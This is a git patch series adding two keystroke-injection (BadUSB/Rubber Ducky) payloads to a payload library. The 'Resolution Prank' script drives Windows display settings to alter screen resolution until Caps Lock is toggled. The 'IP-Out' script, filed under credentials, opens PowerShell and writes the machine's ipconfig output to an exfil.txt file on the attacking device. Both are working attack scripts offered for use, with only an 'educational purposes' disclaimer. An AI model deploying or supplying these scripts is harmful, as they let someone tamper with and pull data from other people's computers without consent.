From 8073d4d9cd172d2dc1499293d5e1e2419b8cde1d Mon Sep 17 00:00:00 2001 From: mavisinator30001 <129871621+mavisinator30001@users.noreply.github.com> Date: Wed, 18 Sep 2024 07:30:59 -0700 Subject: [PATCH 1/4] Create Resolution_Prank.txt Added Resolution_Prank folder and related payload into said folder --- .../Resolution_Prank/Resolution_Prank.txt | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 payloads/library/prank/Resolution_Prank/Resolution_Prank.txt diff --git a/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt b/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt new file mode 100644 index 0000000..f0eeb63 --- /dev/null +++ b/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt @@ -0,0 +1,59 @@ +REM TITLE Resolution Prank +REM AUTHOR Mavis Coffey +REM TARGET Any system running Windows 10/11 +REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back +LED_G +DELAY 500 +CTRL GUI d +DELAY 500 +GUI i +DELAY 2000 +STRING display +ENTER +DELAY 2500 +TAB +ENTER +DELAY 200 +REPEAT 8 TAB +ENTER +VAR $CAPS_STATE = $_CAPSLOCK_ON +WHILE ($CAPS_STATE == $_CAPSLOCK_ON) +HOLD DOWN +DELAY 1000 + RELEASE DOWN + ENTER + DELAY 200 + LEFT + DELAY 200 + ENTER + + REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED + VAR $LIGHT_UP_TIMES = 20 + WHILE ($LIGHT_UP_TIMES > 0) + LED_G + DELAY 300 + LED_OFF + DELAY 300 + LED_R + DELAY 300 + LED_OFF + DELAY 300 + $LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1 + END_WHILE + WAIT_FOR_CAPS_CHANGE +END_WHILE +DELAY 300 +REPEAT 12 TAB +ENTER +DELAY 200 +HOLD UP +DELAY 1000 +RELEASE UP +ENTER +DELAY 200 +LEFT +ENTER +DELAY 1000 +ALT F4 +DELAY 200 +CTRL GUI F4 From 6ad0b7836c163836984d7e54f4e7fb02a39777fe Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Fri, 20 Sep 2024 08:25:58 -0700 Subject: [PATCH 2/4] Create payload.txt Added IP-Out Ducky payload --- .../library/credentials/IP-Out/payload.txt | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 payloads/library/credentials/IP-Out/payload.txt diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt new file mode 100644 index 0000000..66735ca --- /dev/null +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -0,0 +1,21 @@ +REM Title: IP-Out +REM Author: Mavis Coffey +REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB +REM Target: Any Windows System +REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY +ATTACKMODE HID STORAGE +DELAY 500 +GUI r +DELAY 300 +STRING Powershell +ENTER +DELAY 1000 +STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8 +ENTER +WAIT_FOR_STORAGE_ACTIVITY +WAIT_FOR_STORAGE_INACTIVITY +ALT F4 +ATTACKMODE OFF +REM And should the attacker want to make sure the payload was successful: +WAIT_FOR_BUTTON_PRESS +ATTACKMODE STORAGE From 8293bf5d4d014e656ff017bf2f44b927a0ee4ac8 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Fri, 20 Sep 2024 08:28:44 -0700 Subject: [PATCH 3/4] Update payload.txt Changed author comment to display my username rather than my real name --- payloads/library/credentials/IP-Out/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt index 66735ca..41481a9 100644 --- a/payloads/library/credentials/IP-Out/payload.txt +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -1,5 +1,5 @@ REM Title: IP-Out -REM Author: Mavis Coffey +REM Author: Mavisinator30001 REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB REM Target: Any Windows System REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY From cf0c83d37c939c86dd885d152406f828b64d7f86 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Fri, 20 Sep 2024 08:30:00 -0700 Subject: [PATCH 4/4] Update and rename Resolution_Prank.txt to payload.txt Changed author name to my username rather than real name. Changed payload file name to payload.txt --- .../Resolution_Prank/{Resolution_Prank.txt => payload.txt} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename payloads/library/prank/Resolution_Prank/{Resolution_Prank.txt => payload.txt} (97%) diff --git a/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt b/payloads/library/prank/Resolution_Prank/payload.txt similarity index 97% rename from payloads/library/prank/Resolution_Prank/Resolution_Prank.txt rename to payloads/library/prank/Resolution_Prank/payload.txt index f0eeb63..b171cf3 100644 --- a/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt +++ b/payloads/library/prank/Resolution_Prank/payload.txt @@ -1,5 +1,5 @@ REM TITLE Resolution Prank -REM AUTHOR Mavis Coffey +REM AUTHOR Mavisinator30001 REM TARGET Any system running Windows 10/11 REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back LED_G